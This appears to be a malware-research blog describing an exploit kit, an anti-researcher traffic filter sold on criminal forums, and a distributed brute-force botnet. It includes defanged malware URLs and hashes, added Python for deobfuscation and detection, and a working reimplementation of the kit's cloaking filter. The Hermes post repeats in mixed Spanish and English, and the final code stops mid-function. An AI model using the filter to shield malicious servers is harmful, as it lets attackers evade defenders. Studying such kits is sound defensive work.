Laboratorio Malware: malware research laboratory (cyberintelligence, viruses, trojans, bankers, fraud, bots, botnets). Author: Jose Dos Santos.<br />
Anonymous Exploit Kit (2013-02-11)<br />
<span style="font-family: Arial,Helvetica,sans-serif;">A new malware injection kit named "Anonymous exploits kit" has been found.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br />It is hosted at the domain zaebal11.uni.me, on an IP address located in Panama.<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">The infection vector that starts the trojan download is:<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">hXXp://zaebal11.uni.me/loads/</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br />This downloads the malicious binary:<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">hXXp://zaebal11.uni.me/loads/cita.exe<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">Size of cita.exe: 271622 bytes<br />MD5: 6b7a7415276014b9a9e6350724f4cae7<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">The binary infects the victim with the Citadel trojan, which attempts to connect to the malicious domain netreverseram.ru, currently inactive.<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">The statistics panel of "Anonymous exploits kit" is reached at the URL:<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">hXXp://zaebal11.uni.me/loads/statistics/login.php</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">which shows the following screen:<br /> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-H893jfTIoYY/UReY6I9s3cI/AAAAAAAAAd0/FTvED1Ywqxc/s1600/anonymous-exploit-kit-login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://4.bp.blogspot.com/-H893jfTIoYY/UReY6I9s3cI/AAAAAAAAAd0/FTvED1Ywqxc/s400/anonymous-exploit-kit-login.jpg" width="400" /></a></div>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Once inside the panel, one can see tracking information on infected users: the victim's country of origin, operating system version, browser version, etc.<br /> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-NOMsAZ4qRIs/UReZAGmvaII/AAAAAAAAAd8/OhBvlZGH1I4/s1600/anonymous-exploit-kit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://1.bp.blogspot.com/-NOMsAZ4qRIs/UReZAGmvaII/AAAAAAAAAd8/OhBvlZGH1I4/s400/anonymous-exploit-kit.jpg" width="400" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br />At the time of analysis the kit was at a very early stage, with no infected users yet. The only traces were from the kit's authors, connecting from an IP address in the Netherlands.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br />The file structure of the kit is:<br /> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-CJiSVcuHYPM/UReZyFEiCBI/AAAAAAAAAeE/QyqarBdbAY4/s1600/anonymous-files.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="http://4.bp.blogspot.com/-CJiSVcuHYPM/UReZyFEiCBI/AAAAAAAAAeE/QyqarBdbAY4/s400/anonymous-files.jpg" width="400" /></a></div>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">A notable novelty is that the code of every file that makes up the kit has been Base64-encoded. Base64 is an encoding, not encryption: it hides the source from a casual look but is trivially reversible.<br /> </span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">The kit takes advantage of known Java and PDF vulnerabilities to infect the user, according to the exploits configured in the kit:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-lUisznnv3pE/UReZ8PfWikI/AAAAAAAAAeU/yZFxeuZfkvM/s1600/anonymous-files2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="http://4.bp.blogspot.com/-lUisznnv3pE/UReZ8PfWikI/AAAAAAAAAeU/yZFxeuZfkvM/s400/anonymous-files2.jpg" width="400" /></a></div>
<br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">The exploits are encoded in the same way so that they cannot be reused by other criminal groups, and once the criminals finish adapting the kit it will most likely include the latest vulnerabilities published for Java.</span><br />
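The post does not show the kit's source, only that its files are Base64-wrapped. The following is an added example, not code from the kit or from the original post: it assumes the common PHP wrapping pattern eval(base64_decode("...")), possibly nested, and peels the layers off to recover the underlying source. The sample PHP it operates on is constructed here; the function names are the example's own.

```python
import base64
import re

# Constructed sample: a small PHP stub wrapped in two nested eval(base64_decode(...)) layers.
# This is NOT a file from the kit; it is built here so the example runs offline.
INNER = '<?php $payload = "cita.exe"; header("Location: /loads/" . $payload); ?>'
_LAYER1 = 'eval(base64_decode("' + base64.b64encode(INNER.encode()).decode() + '"));'
SAMPLE_PHP = '<?php eval(base64_decode("' + base64.b64encode(_LAYER1.encode()).decode() + '")); ?>'

# Matches eval(base64_decode("...")) or eval(base64_decode('...')), tolerating whitespace
# and line breaks inside the Base64 blob. Assumed pattern, not taken from the kit.
_WRAPPER = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)""",
    re.IGNORECASE,
)


def peel_base64_layers(source: str, max_layers: int = 16) -> tuple:
    """Strip nested eval(base64_decode()) wrappers from a PHP file.

    Returns (recovered_source, layers_removed). Stops when no wrapper is found,
    when the blob is not valid Base64, or after max_layers (guards against
    a blob that decodes to itself or to another endless wrapper chain).
    Assumes the file consists of the wrapper itself, which is the usual shape
    of these loaders; code outside the wrapper at one layer is discarded.
    """
    layers = 0
    current = source
    while layers < max_layers:
        m = _WRAPPER.search(current)
        if not m:
            break
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            # validate=True rejects anything that is not strict Base64 (binascii.Error is a ValueError).
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")
        except ValueError:
            break
        current = decoded
        layers += 1
    return current, layers


if __name__ == "__main__":
    recovered, n = peel_base64_layers(SAMPLE_PHP)
    print(f"removed {n} layer(s):")
    print(recovered)
```

Running it against a real kit dump, one would point the function at each file under loads/ in turn and review what comes out; anything still wrapped after max_layers deserves manual attention, since the decode chain may be deliberately self-referential.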
<span style="font-family: Arial,Helvetica,sans-serif;"><br />In fact, the same malicious domain also hosts the control panel of the well-known Multilocker trojan (the "Police" trojan), which spreads using Java exploits.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br />As shown in the following screens:<br /> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-IGG4plWTgqY/UReaBVH-YhI/AAAAAAAAAec/CXxbHqa_uZk/s1600/multilocker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://4.bp.blogspot.com/-IGG4plWTgqY/UReaBVH-YhI/AAAAAAAAAec/CXxbHqa_uZk/s400/multilocker.jpg" width="400" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;">And the list of defrauded users who have already paid to unlock their computers:<br /> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-rOxX9O8tqHs/UReaF71ovBI/AAAAAAAAAek/tWiHFncavac/s1600/multilocker-B2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="http://2.bp.blogspot.com/-rOxX9O8tqHs/UReaF71ovBI/AAAAAAAAAek/tWiHFncavac/s400/multilocker-B2.JPG" width="400" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /></span>
Antibot Guard System v.1.0 Experimental (2013-01-27)<br />
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">This new crimeware kit has been designed to filter the traffic that reaches the fraudulent server on which it is installed.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">It is not a firewall; it works at the level of controlling the user's browsing.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">It comes with a honeypot database of 132k entries.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Its purpose is to drop all traffic the criminals do not consider interesting. In this way they obtain a high rate of genuine hits on their malicious control panels, removing a large amount of noise that hurts the panel's efficiency, and they also drop every hit that comes from addresses belonging to malware research teams and other security firms fighting cybercrime.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-tkAyP5VmjMk/UQUa37FH31I/AAAAAAAAAc0/96V5k3lGNfk/s1600/antibot-admin.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="http://3.bp.blogspot.com/-tkAyP5VmjMk/UQUa37FH31I/AAAAAAAAAc0/96V5k3lGNfk/s400/antibot-admin.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The first references to this kit appear in the Russian underground forums specialized in this kind of subject. Its author is XShaman, who also designed the old exploit distribution kit "Shaman's Dream", and who this time offers it at an "issue price of 500", as seen in his forum advertisement:</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-GRrmAg-2KW4/UQUbBEAFWRI/AAAAAAAAAc8/QPPcxbm-vLw/s1600/antibot-E.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="393" src="http://1.bp.blogspot.com/-GRrmAg-2KW4/UQUbBEAFWRI/AAAAAAAAAc8/QPPcxbm-vLw/s400/antibot-E.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">In fact, accessing the control panel reveals a strong resemblance to the "Shaman's Dream" panel.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The criminals only need to install this AntiBot kit and modify the .htaccess file of the server where they have set up their infrastructure, so that all traffic to the fraudulent control panels is first filtered by the Antibot Guard System.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-FRSu3J-9mks/UQUbLIAMbdI/AAAAAAAAAdE/3GugsWvH-AU/s1600/antibot-login.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="http://3.bp.blogspot.com/-FRSu3J-9mks/UQUbLIAMbdI/AAAAAAAAAdE/3GugsWvH-AU/s400/antibot-login.JPG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The panel has functions to deny access from every honeypot IP address it has registered, as well as special protection against GoogleBot, anti-proxy checks, etc.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">It allows banning users by browser type (MSIE, Firefox, Opera, Chrome), either choosing from the list or defining a specific browser.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">It includes a GeoIP module for IP geolocation, used to specify a list of countries whose traffic is to be discarded as noise, in the form US,GB,CA,AU, etc.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Configuration screen for the traffic to be banned:</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-YTofWP7gX08/UQUbS9EMvHI/AAAAAAAAAdM/qzb6NJBQWlk/s1600/antibot-baneo.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-YTofWP7gX08/UQUbS9EMvHI/AAAAAAAAAdM/qzb6NJBQWlk/s400/antibot-baneo.JPG" width="377" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">This menu asks for an additional security password to prevent changes by unauthorized personnel.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">It even denies traffic if the user does not have Flash Player installed, for which a good number of vulnerabilities currently exist, and it can ban users whose browsers carry certain cookies.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">It also blocks every request coming from certain addresses by inspecting the Referer header of the user's request, such as the addresses of websites specialized in collecting malware and phishing data:</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-X1bYr7PKFXA/UQUbbuP3RtI/AAAAAAAAAdU/7ASTX5M9xZ4/s1600/antibot-C.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-X1bYr7PKFXA/UQUbbuP3RtI/AAAAAAAAAdU/7ASTX5M9xZ4/s400/antibot-C.jpg" width="295" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
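To make the filtering behaviour described above concrete, here is an added example, not code from Antibot Guard System or from the original post, that implements the same kind of decision chain over constructed requests: honeypot IP list, bot user agents, browser ban list, GeoIP country list, Flash requirement, cookie bans and Referer bans. Every concrete value (IP prefixes, country codes, host names, rule thresholds) is an assumption made for the example; the kit's real 132k-entry honeypot database and its Referer list are not reproduced. The practical point for a researcher is visible in the output: a sandbox that arrives from a listed IP, with a crawler user agent, or with a Referer from a known tracking site, is served nothing and never reaches the exploit page.

```python
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class FilterConfig:
    """Hypothetical rule set modelled on the panel options the post lists. Values are constructed."""
    honeypot_ips: set = field(default_factory=lambda: {"192.0.2.10", "198.51.100.7"})
    bot_ua_markers: tuple = ("Googlebot", "bingbot", "curl/", "python-requests")
    banned_browsers: set = field(default_factory=lambda: {"Opera", "Chrome"})
    banned_countries: set = field(default_factory=lambda: {"US", "GB", "CA", "AU"})
    require_flash: bool = True
    banned_cookies: set = field(default_factory=lambda: {"seen"})
    banned_referer_hosts: set = field(
        default_factory=lambda: {"malwaretracker.example", "phishfeed.example"})


# Constructed stand-in for the kit's GeoIP module: /24 prefix -> ISO country code.
GEOIP = {"192.0.2.": "US", "198.51.100.": "GB", "203.0.113.": "ES"}


def country_of(ip: str) -> str:
    for prefix, cc in GEOIP.items():
        if ip.startswith(prefix):
            return cc
    return "??"


def browser_family(user_agent: str) -> str:
    """Coarse UA classification using the family names the panel's ban list uses."""
    if "Opera" in user_agent or "OPR/" in user_agent:
        return "Opera"
    if "Chrome/" in user_agent:
        return "Chrome"
    if "Firefox/" in user_agent:
        return "Firefox"
    if "MSIE" in user_agent or "Trident/" in user_agent:
        return "MSIE"
    return "Other"


def decide(req: dict, cfg: FilterConfig) -> tuple:
    """Return (allowed, reason) for one request.

    req keys: ip, ua, referer, cookies (dict of name -> value), flash (bool, as the
    kit would learn from a client-side probe). Checks run in the order a front filter
    would apply them: cheapest lookups first, the Referer inspection last.
    """
    if req["ip"] in cfg.honeypot_ips:
        return False, "honeypot_ip"
    if any(marker in req["ua"] for marker in cfg.bot_ua_markers):
        return False, "bot_ua"
    fam = browser_family(req["ua"])
    if fam in cfg.banned_browsers:
        return False, f"browser:{fam}"
    cc = country_of(req["ip"])
    if cc in cfg.banned_countries:
        return False, f"geo:{cc}"
    if cfg.require_flash and not req.get("flash", False):
        return False, "no_flash"
    if cfg.banned_cookies & set(req.get("cookies", {})):
        return False, "cookie"
    ref_host = urlsplit(req.get("referer", "")).hostname or ""
    if ref_host in cfg.banned_referer_hosts:
        return False, "referer"
    return True, "pass"


# Constructed requests: an intended victim, a researcher's sandbox, and a search crawler.
SAMPLE_REQUESTS = {
    "victim": {"ip": "203.0.113.25",
               "ua": "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0",
               "referer": "http://forum.example/thread/42", "cookies": {}, "flash": True},
    "researcher": {"ip": "198.51.100.7",
                   "ua": "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0",
                   "referer": "http://malwaretracker.example/urls", "cookies": {}, "flash": True},
    "crawler": {"ip": "203.0.113.99", "ua": "Mozilla/5.0 (compatible; Googlebot/2.1)",
                "referer": "", "cookies": {}, "flash": False},
}


def triage(requests: dict, cfg: FilterConfig = FilterConfig()) -> dict:
    """Run every request through the filter; returns name -> (allowed, reason)."""
    return {name: decide(req, cfg) for name, req in requests.items()}


if __name__ == "__main__":
    for name, (allowed, reason) in triage(SAMPLE_REQUESTS).items():
        print(f"{name:10s} {'PASS' if allowed else 'DROP':4s} {reason}")
```

When probing infrastructure that may sit behind a filter like this, vary the source network, send a realistic browser user agent, and do not carry a Referer from a tracking site; a benign or empty response from one vantage point does not mean the exploit page is gone.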
PANEL HERMES. BOTNET FOR DISTRIBUTED BRUTE FORCE ATTACKS (2013-01-22)<br />
<div class="MsoNormal" style="background: white; line-height: 15.6pt;">
<span style="color: #333333; font-family: Arial; font-size: 11.5pt;">The Hermes botnet has been developed to discover access credentials for servers and other services through distributed brute force attacks.</span></div>
<div class="MsoNormal" style="background: white; line-height: 15.6pt;">
<br /></div>
<div class="MsoNormal">
<span style="color: #333333; font-family: Arial; font-size: 11.0pt;">This is a botnet with a control panel almost identical to the one used by the Zeus trojan, but with different functionality.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">It uses the zombie machines infected by the trojan as attack vectors, spreading the workload among them so that each infected computer performs multiple authentication attempts against the target machine. The result is a distributed brute force tool.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Here is the control panel of the Hermes botnet:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WmR05Ca8WSo/UP8Gn2L095I/AAAAAAAAAb0/JrglWK0b4P4/s1600/hermes-B.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="http://1.bp.blogspot.com/-WmR05Ca8WSo/UP8Gn2L095I/AAAAAAAAAb0/JrglWK0b4P4/s400/hermes-B.JPG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The more compromised machines the panel controls, the greater the brute force attack power, with thousands of authentication attempts launched from different IP addresses.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">This also confuses the security systems of the attacked hosts: because many machines with different IP addresses take part in the incident at the same time, blocking them is hard, since the classic approach of counting repeated requests from the same IP address no longer recognizes the activity as a brute force incident. Detection has to aggregate by target (the account or host being attacked) rather than by source.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The settings menu shows the list of passwords to be used in the brute force attack:</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-v4YbTVW_KUk/UP8Gx5u05XI/AAAAAAAAAb8/grB5_Es1R1U/s1600/hermes-settings-B.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-v4YbTVW_KUk/UP8Gx5u05XI/AAAAAAAAAb8/grB5_Es1R1U/s320/hermes-settings-B.JPG" width="196" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">In the Import option of the panel menu, the target machine for the distributed brute force attack is selected, together with the name of a previously uploaded file containing the list of usernames. Authentication attempts are then launched against the victim host with every username/password pair formed from that list and the password list above.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-6WzEWVdP6DE/UP8G4VW2iEI/AAAAAAAAAcE/AOgX6nerG8Y/s1600/hermes-import.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="211" src="http://2.bp.blogspot.com/-6WzEWVdP6DE/UP8G4VW2iEI/AAAAAAAAAcE/AOgX6nerG8Y/s400/hermes-import.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">In the Hermes panel analyzed here, it can be seen that the criminals used it for testing with files containing IP address ranges of live machines hosted at the US ISPs Dreamhost and GoDaddy, along with the list of files holding the usernames for the brute force attack.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The username files contain lists of people's first names and surnames to try.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-c63VSO4eSJE/UP8HAbFsnAI/AAAAAAAAAcM/EN8PcLFV-3E/s1600/hermes-users.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-c63VSO4eSJE/UP8HAbFsnAI/AAAAAAAAAcM/EN8PcLFV-3E/s320/hermes-users.jpg" width="129" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The Notes option of the panel shows how thousands of requests were made against GoDaddy addresses to test the Hermes panel.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-YlnxlXZ6vCw/UP8HGaDGk3I/AAAAAAAAAcU/zmyUEwM5udE/s1600/hermes-notes-B.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/-YlnxlXZ6vCw/UP8HGaDGk3I/AAAAAAAAAcU/zmyUEwM5udE/s400/hermes-notes-B.JPG" width="218" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">On 05/12/2012, 513,000 brute force authentication attempts were made against GoDaddy servers at 18:15, 410,000 at 21:15, 481,460 at 22:44, and so on.</span></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-12123784641198858182013-01-22T13:44:00.000-08:002013-01-22T13:44:33.762-08:00PANEL HERMES. BOTNET DE ATAQUE POR FUERZA BRUTA DISTRIBUIDA<br />
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 15px;">La botnet Hermes ha sido diseñada para tratar de descubrir las credenciales de acceso a los servidores u otros servicios mediante ataque por fuerza bruta.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Nos
encontramos ante una botnet con un panel de Control casi idéntico al empleado
por el troyano ZEUS pero con funcionalidades diferentes.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Para ello
utiliza los usuarios zombies infectados por el troyano como vectores de ataque
para repartir el proceso de trabajo entre ellos y que cada ordenador infectado
realice múltiples intentos de autenticación contra la máquina destino. Así pues
tenemos una herramienta de Fuerza Bruta Distribuida.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Este es el
Panel de Control de <st1:personname productid="la Botnet Hermes" w:st="on"><st1:personname productid="la Botnet" w:st="on">la Botnet</st1:personname> Hermes</st1:personname>:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WmR05Ca8WSo/UP8Gn2L095I/AAAAAAAAAb0/JrglWK0b4P4/s1600/hermes-B.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://1.bp.blogspot.com/-WmR05Ca8WSo/UP8Gn2L095I/AAAAAAAAAb0/JrglWK0b4P4/s400/hermes-B.JPG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The
more compromised machines the Control Panel controls, the greater the power of
the brute-force attack, launching thousands of authentication attempts from
different IPs. It also confuses the security systems of the attacked host,
because a wide variety of machines from different IPs take part in the incident
simultaneously, which makes blocking these IPs difficult: it becomes quite
complicated to tally continued requests from the same IP as a brute-force
incident.</span></div>
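<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">The evasion described above (many sources, each making only a few attempts) is exactly what a per-source-IP threshold misses. The following Python is an added example, not code from this post or from the Hermes panel: it parses constructed sshd-style failure lines (every address, username and time is made up) and contrasts a per-IP rule with a per-target rule that counts failures and distinct source IPs per time window.</span></div>

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sshd-style auth log of one target host (every IP, username and
# timestamp is made up for this example). The 18:15 slot mimics the pattern
# the post describes: many sources, one attempt each. The 21:15 slot is an
# ordinary single-source brute force, included for contrast.
SAMPLE_LOG = """\
Dec  5 18:15:02 host1 sshd[4012]: Failed password for admin from 198.51.100.11 port 51012 ssh2
Dec  5 18:15:09 host1 sshd[4013]: Failed password for invalid user test from 198.51.100.12 port 51013 ssh2
Dec  5 18:15:17 host1 sshd[4014]: Failed password for root from 198.51.100.13 port 51014 ssh2
Dec  5 18:15:33 host1 sshd[4015]: Failed password for admin from 198.51.100.14 port 51015 ssh2
Dec  5 18:16:01 host1 sshd[4016]: Failed password for invalid user test from 198.51.100.15 port 51016 ssh2
Dec  5 18:16:24 host1 sshd[4017]: Failed password for root from 198.51.100.16 port 51017 ssh2
Dec  5 18:16:48 host1 sshd[4018]: Failed password for admin from 198.51.100.17 port 51018 ssh2
Dec  5 18:17:05 host1 sshd[4019]: Failed password for root from 198.51.100.18 port 51019 ssh2
Dec  5 18:17:39 host1 sshd[4020]: Failed password for admin from 198.51.100.19 port 51020 ssh2
Dec  5 18:18:12 host1 sshd[4021]: Failed password for invalid user test from 198.51.100.20 port 51021 ssh2
Dec  5 18:18:44 host1 sshd[4022]: Failed password for root from 198.51.100.21 port 51022 ssh2
Dec  5 18:19:21 host1 sshd[4023]: Failed password for admin from 198.51.100.22 port 51023 ssh2
Dec  5 21:15:03 host1 sshd[5101]: Failed password for root from 203.0.113.9 port 40001 ssh2
Dec  5 21:15:04 host1 sshd[5102]: Failed password for root from 203.0.113.9 port 40002 ssh2
Dec  5 21:15:05 host1 sshd[5103]: Failed password for root from 203.0.113.9 port 40003 ssh2
Dec  5 21:15:06 host1 sshd[5104]: Failed password for root from 203.0.113.9 port 40004 ssh2
Dec  5 21:15:07 host1 sshd[5105]: Failed password for root from 203.0.113.9 port 40005 ssh2
Dec  5 21:15:08 host1 sshd[5106]: Failed password for root from 203.0.113.9 port 40006 ssh2
"""

# Matches OpenSSH "Failed password" records; the "invalid user" marker is optional.
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)


def parse_failures(text, year=2012):
    """Return (timestamp, username, source_ip) for every failed-login line."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a failed-login record
        stamp = " ".join(m["ts"].split())  # collapse syslog's padded day field
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["user"], m["ip"]))
    return events


def bucket_of(ts, window):
    """Floor a timestamp to the start of its fixed-size time window."""
    origin = datetime(ts.year, 1, 1)
    return ts - (ts - origin) % window


def per_ip_alerts(events, window=timedelta(minutes=5), threshold=5):
    """Classic rule: at least `threshold` failures from ONE source IP inside a
    window. A botnet that spreads attempts over many hosts stays under it."""
    counts = Counter((bucket_of(ts, window), ip) for ts, _, ip in events)
    return sorted((b, ip, n) for (b, ip), n in counts.items() if n >= threshold)


def distributed_alerts(events, window=timedelta(minutes=5),
                       min_total=10, min_sources=8):
    """Aggregate per target instead of per source: flag a window with many
    failures coming from many distinct IPs, however few each IP contributed."""
    by_window = defaultdict(list)
    for ts, user, ip in events:
        by_window[bucket_of(ts, window)].append((user, ip))
    alerts = []
    for b, items in sorted(by_window.items()):
        per_ip = Counter(ip for _, ip in items)
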